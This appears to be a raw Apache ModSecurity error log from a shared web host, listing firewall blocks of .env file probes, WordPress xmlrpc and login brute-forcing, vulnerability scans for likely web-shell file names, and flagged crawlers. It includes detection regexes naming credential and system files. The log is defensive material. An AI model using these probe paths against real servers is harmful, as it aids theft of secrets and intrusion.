[Tue May 26 12:58:51.712751 2026] [security2:error] [pid 470766:tid 471019] [client 176.65.139.235:20596] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.katalystconsulting.svijaykumar.in"] [uri "/.env"] [unique_id "ahVLs-jO_W1DqEcFHQ7aFQAAAHs"]
[Tue May 26 12:58:52.311566 2026] [security2:error] [pid 470766:tid 470949] [client 57.141.2.26:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVLs-jO_W1DqEcFHQ7aGAAAADU"]
[Tue May 26 12:58:54.054814 2026] [security2:error] [pid 470766:tid 470998] [client 176.65.139.237:29878] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "rabbanitradingcompany.com"] [uri "/.env"] [unique_id "ahVLtujO_W1DqEcFHQ7aSwAAAGY"]
[Tue May 26 12:58:57.185904 2026] [security2:error] [pid 470766:tid 471014] [client 85.208.96.206:55882] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "theafterglow-centre.com"] [uri "/events/category/summer-kids-camp/page/2/"] [unique_id "ahVLuejO_W1DqEcFHQ7ajwAAAHY"]
[Tue May 26 12:58:57.186130 2026] [security2:error] [pid 470766:tid 471014] [client 85.208.96.206:55882] ModSecurity: Warning. Matched phrase "Semrush" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "theafterglow-centre.com"] [uri "/events/category/summer-kids-camp/page/2/"] [unique_id "ahVLuejO_W1DqEcFHQ7ajwAAAHY"]
[Tue May 26 12:58:57.626252 2026] [security2:error] [pid 470766:tid 470950] [client 57.141.2.36:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVLuejO_W1DqEcFHQ7akgAAADY"]
[Tue May 26 12:58:57.977892 2026] [security2:error] [pid 470766:tid 470929] [client 157.20.138.61:53087] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 61.138.20.157.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahVLuejO_W1DqEcFHQ7apAAAACE"]
[Tue May 26 12:58:57.978051 2026] [security2:error] [pid 470766:tid 470929] [client 157.20.138.61:53087] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahVLuejO_W1DqEcFHQ7apAAAACE"]
[Tue May 26 12:59:00.242558 2026] [security2:error] [pid 470766:tid 470966] [client 57.141.2.60:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVLu-jO_W1DqEcFHQ7azgAAAEY"]
[Tue May 26 12:59:00.716510 2026] [security2:error] [pid 470766:tid 470974] [client 66.249.64.96:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "302"] [hostname "eco-green.com.mx"] [uri "/w2.php"] [unique_id "ahVLvOjO_W1DqEcFHQ7a4wAAAE4"]
[Tue May 26 12:59:00.717011 2026] [security2:error] [pid 470766:tid 470988] [client 66.249.64.96:58347] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "302"] [hostname "eco-green.com.mx"] [uri "/w2.php"] [unique_id "ahVLvOjO_W1DqEcFHQ7a2wAAAFw"]
[Tue May 26 12:59:02.765233 2026] [security2:error] [pid 470766:tid 470920] [client 57.141.2.6:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVLvujO_W1DqEcFHQ7bAAAAABg"]
[Tue May 26 12:59:05.088739 2026] [security2:error] [pid 470766:tid 470956] [client 57.141.2.51:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVLwOjO_W1DqEcFHQ7bNQAAADw"]
[Tue May 26 12:59:08.018447 2026] [security2:error] [pid 470766:tid 470899] [client 57.141.2.28:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVLw-jO_W1DqEcFHQ7bdQAAAAM"]
[Tue May 26 12:59:08.272324 2026] [security2:error] [pid 470766:tid 470885] [remote 74.7.241.58:59282] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 58.241.7.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.billing.mosykay.com"] [uri "/app/password/reset"] [unique_id "ahVLxOjO_W1DqEcFHQ7bjAAACnY"], referer: https://www.billing.mosykay.com/app/password/reset?path=/home1/taote1zo/www/shop/wp-content/plugins/yith-woocommerce-wishlist/plugin-fw/templates/fields
[Tue May 26 12:59:08.538738 2026] [security2:error] [pid 470766:tid 470904] [client 14.169.240.50:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVLxOjO_W1DqEcFHQ7bhQAAAAg"]
[Tue May 26 12:59:08.586154 2026] [security2:error] [pid 470766:tid 470979] [client 157.20.138.61:53441] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 61.138.20.157.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahVLxOjO_W1DqEcFHQ7bkQAAAFM"]
[Tue May 26 12:59:08.586320 2026] [security2:error] [pid 470766:tid 470979] [client 157.20.138.61:53441] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahVLxOjO_W1DqEcFHQ7bkQAAAFM"]
[Tue May 26 12:59:10.385874 2026] [security2:error] [pid 470766:tid 470954] [client 57.141.2.60:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVLxejO_W1DqEcFHQ7bygAAADo"]
[Tue May 26 12:59:12.251896 2026] [security2:error] [pid 470766:tid 470988] [client 91.242.236.215:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.anujtradingco.com"] [uri "/index.php"] [unique_id "ahVLyOjO_W1DqEcFHQ7cEwAAAFw"], referer: https://www.anujtradingco.com/
[Tue May 26 12:59:12.581885 2026] [security2:error] [pid 470766:tid 470996] [client 57.141.2.2:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVLyOjO_W1DqEcFHQ7cDAAAAGQ"]
[Tue May 26 12:59:13.268367 2026] [security2:error] [pid 470766:tid 470912] [client 91.242.236.215:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahVLyejO_W1DqEcFHQ7cLAAAABA"], referer: https://www.anujtradingco.com/pages/services-modern/?unapproved=1431741&moderation-hash=49c10c23b02da98e066105372b2c9381
[Tue May 26 12:59:14.933327 2026] [security2:error] [pid 470766:tid 471008] [client 57.141.2.24:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVLyujO_W1DqEcFHQ7cTQAAAHA"]
[Tue May 26 12:59:16.755915 2026] [security2:error] [pid 470766:tid 470789] [remote 82.223.0.235:36824] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 235.0.223.82.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "theafterglow-centre.com"] [uri "/wp-login.php"] [unique_id "ahVLzOjO_W1DqEcFHQ7cdAAATBY"]
[Tue May 26 12:59:18.214088 2026] [security2:error] [pid 470766:tid 470987] [client 57.141.2.19:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVLzejO_W1DqEcFHQ7cjwAAAFs"]
[Tue May 26 12:59:19.051421 2026] [security2:error] [pid 470766:tid 470914] [client 157.20.138.61:53792] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 61.138.20.157.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahVLz-jO_W1DqEcFHQ7crwAAABI"]
[Tue May 26 12:59:19.051592 2026] [security2:error] [pid 470766:tid 470914] [client 157.20.138.61:53792] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahVLz-jO_W1DqEcFHQ7crwAAABI"]
[Tue May 26 12:59:20.055388 2026] [security2:error] [pid 470766:tid 470995] [client 57.141.2.3:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVLz-jO_W1DqEcFHQ7cuwAAAGM"]
[Tue May 26 12:59:20.557916 2026] [security2:error] [pid 470766:tid 471007] [client 74.7.244.52:53842] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "301"] [hostname "wrapmachines.com"] [uri "/robots.txt"] [unique_id "ahVL0OjO_W1DqEcFHQ7cyAAAbyY"]
[Tue May 26 12:59:21.567295 2026] [security2:error] [pid 470766:tid 470982] [client 4.201.75.230:5354] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 230.75.201.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "triviewsolutions.com"] [uri "/wk/index.php"] [unique_id "ahVL0ejO_W1DqEcFHQ7c1QAAAFY"]
[Tue May 26 12:59:22.003951 2026] [security2:error] [pid 470766:tid 470978] [client 74.7.244.52:35420] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "200"] [hostname "www.wrapmachines.com"] [uri "/index.php"] [unique_id "ahVL0OjO_W1DqEcFHQ7czQAAAFI"]
[Tue May 26 12:59:23.227860 2026] [security2:error] [pid 470766:tid 470933] [client 57.141.2.30:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVL0ujO_W1DqEcFHQ7dHwAAACU"]
[Tue May 26 12:59:23.552090 2026] [security2:error] [pid 470766:tid 470990] [client 4.201.75.230:5633] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 230.75.201.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "triviewsolutions.com"] [uri "/inputs.php"] [unique_id "ahVL0-jO_W1DqEcFHQ7dNwAAAF4"]
[Tue May 26 12:59:23.879954 2026] [security2:error] [pid 470766:tid 470841] [remote 95.216.117.13:50544] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 13.117.216.95.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahVL0-jO_W1DqEcFHQ7dQgAAYko"]
[Tue May 26 12:59:24.799309 2026] [security2:error] [pid 470766:tid 471012] [client 4.201.75.230:5342] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 230.75.201.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "triviewsolutions.com"] [uri "/ioxi-o.php"] [unique_id "ahVL1OjO_W1DqEcFHQ7dcwAAAHQ"]
[Tue May 26 12:59:25.307815 2026] [security2:error] [pid 470766:tid 470976] [client 35.241.166.201:59928] ModSecurity: Access denied with code 406 (phase 1). Pattern match "python-requests|python-urllib" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "1460"] [id "909111"] [msg "Python UA brute"] [hostname "208.91.198.65"] [uri "/"] [unique_id "ahVL1ejO_W1DqEcFHQ7ddwAAAFA"]
[Tue May 26 12:59:25.558852 2026] [security2:error] [pid 470766:tid 470790] [remote 95.216.117.13:50550] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 13.117.216.95.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "jhonparra.com"] [uri "/wp-login.php"] [unique_id "ahVL1ejO_W1DqEcFHQ7dhQAACBc"]
[Tue May 26 12:59:25.825996 2026] [security2:error] [pid 470766:tid 470955] [client 57.141.2.32:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVL1ejO_W1DqEcFHQ7dhAAAADs"]
[Tue May 26 12:59:26.018108 2026] [security2:error] [pid 470766:tid 470913] [client 4.201.75.230:5332] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 230.75.201.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "triviewsolutions.com"] [uri "/function/function.php"] [unique_id "ahVL1ujO_W1DqEcFHQ7digAAABE"]
[Tue May 26 12:59:26.885641 2026] [security2:error] [pid 470766:tid 470972] [client 31.57.184.107:59933] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 107.184.57.31.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "www.glorodbalsa.glorodavionics.com"] [uri "/wp-login.php"] [unique_id "ahVL1ujO_W1DqEcFHQ7dkQAAAEw"], referer: https://www.google.com/
[Tue May 26 12:59:27.813818 2026] [security2:error] [pid 470766:tid 470960] [client 57.141.2.40:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVL1-jO_W1DqEcFHQ7dogAAAEA"]
[Tue May 26 12:59:29.080063 2026] [security2:error] [pid 470766:tid 470958] [client 4.201.75.230:5329] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 230.75.201.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "triviewsolutions.com"] [uri "/rip.php"] [unique_id "ahVL2ejO_W1DqEcFHQ7dzQAAAD4"]
[Tue May 26 12:59:29.637186 2026] [security2:error] [pid 470766:tid 470913] [client 157.20.138.61:54151] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 61.138.20.157.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahVL2ejO_W1DqEcFHQ7d3gAAABE"]
[Tue May 26 12:59:29.637297 2026] [security2:error] [pid 470766:tid 470913] [client 157.20.138.61:54151] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahVL2ejO_W1DqEcFHQ7d3gAAABE"]
[Tue May 26 12:59:30.284074 2026] [security2:error] [pid 470766:tid 470909] [client 4.201.75.230:5336] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 230.75.201.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "triviewsolutions.com"] [uri "/admin.php"] [unique_id "ahVL2ujO_W1DqEcFHQ7d6gAAAA0"]
[Tue May 26 12:59:31.068279 2026] [security2:error] [pid 470766:tid 470993] [client 57.141.2.54:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVL2ujO_W1DqEcFHQ7d9gAAAGE"]
[Tue May 26 12:59:32.439563 2026] [autoindex:error] [pid 470766:tid 470902] [client 185.217.125.16:65453] AH01276: Cannot serve directory /home1/newde164/public_html/.well-known/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: binance.com
[Tue May 26 12:59:32.844443 2026] [security2:error] [pid 470766:tid 471022] [client 57.141.2.42:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVL3OjO_W1DqEcFHQ7eIAAAAH4"]
[Tue May 26 12:59:33.181786 2026] [security2:error] [pid 470766:tid 470940] [client 4.201.75.230:5350] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 230.75.201.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "triviewsolutions.com"] [uri "/wp-content/uploads/index.php"] [unique_id "ahVL3ejO_W1DqEcFHQ7eJwAAACw"]
[Tue May 26 12:59:34.513611 2026] [security2:error] [pid 470766:tid 470833] [remote 37.187.156.42:44366] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 42.156.187.37.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "cagmedya.com"] [uri "/wp-login.php"] [unique_id "ahVL3ujO_W1DqEcFHQ7eOQAAdUI"]
[Tue May 26 12:59:34.783407 2026] [security2:error] [pid 470766:tid 470993] [client 113.186.50.198:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVL3ujO_W1DqEcFHQ7ePwAAAGE"]
[Tue May 26 12:59:35.272857 2026] [security2:error] [pid 470766:tid 470950] [client 4.201.75.230:5367] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 230.75.201.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "triviewsolutions.com"] [uri "/cache.php"] [unique_id "ahVL3-jO_W1DqEcFHQ7eUgAAADY"]
[Tue May 26 12:59:36.156898 2026] [security2:error] [pid 470766:tid 470946] [client 57.141.2.23:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVL3-jO_W1DqEcFHQ7eYQAAADI"]
[Tue May 26 12:59:37.583061 2026] [security2:error] [pid 470766:tid 471020] [client 4.201.75.230:5653] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 230.75.201.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "triviewsolutions.com"] [uri "/themes.php"] [unique_id "ahVL4ejO_W1DqEcFHQ7egwAAAHw"]
[Tue May 26 12:59:38.763950 2026] [security2:error] [pid 470766:tid 470922] [client 57.141.2.38:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVL4ujO_W1DqEcFHQ7ekgAAABo"]
[Tue May 26 12:59:39.625910 2026] [security2:error] [pid 470766:tid 470949] [client 4.201.75.230:5658] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 230.75.201.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "triviewsolutions.com"] [uri "/an.php"] [unique_id "ahVL4-jO_W1DqEcFHQ7esAAAADU"]
[Tue May 26 12:59:40.283477 2026] [security2:error] [pid 470766:tid 470927] [client 157.20.138.61:54505] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 61.138.20.157.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahVL5OjO_W1DqEcFHQ7evAAAAB8"]
[Tue May 26 12:59:40.283638 2026] [security2:error] [pid 470766:tid 470927] [client 157.20.138.61:54505] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahVL5OjO_W1DqEcFHQ7evAAAAB8"]
[Tue May 26 12:59:41.496997 2026] [security2:error] [pid 470766:tid 470939] [client 57.141.2.13:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVL5ejO_W1DqEcFHQ7e7QAAACs"]
[Tue May 26 12:59:43.086581 2026] [security2:error] [pid 470766:tid 470910] [client 4.201.75.230:5333] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 230.75.201.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "triviewsolutions.com"] [uri "/index/function.php"] [unique_id "ahVL5-jO_W1DqEcFHQ7fHAAAAA4"]
[Tue May 26 12:59:44.053224 2026] [security2:error] [pid 470766:tid 470982] [client 57.141.2.5:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVL5-jO_W1DqEcFHQ7fJQAAAFY"]
[Tue May 26 12:59:44.267036 2026] [security2:error] [pid 470766:tid 470947] [client 4.201.75.230:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "triviewsolutions.com"] [uri "/index.php"] [unique_id "ahVL6OjO_W1DqEcFHQ7fNAAAADM"]
[Tue May 26 12:59:44.621912 2026] [security2:error] [pid 470766:tid 471007] [client 4.201.75.230:5371] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 230.75.201.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "triviewsolutions.com"] [uri "/ws.php"] [unique_id "ahVL6OjO_W1DqEcFHQ7fPQAAAG8"]
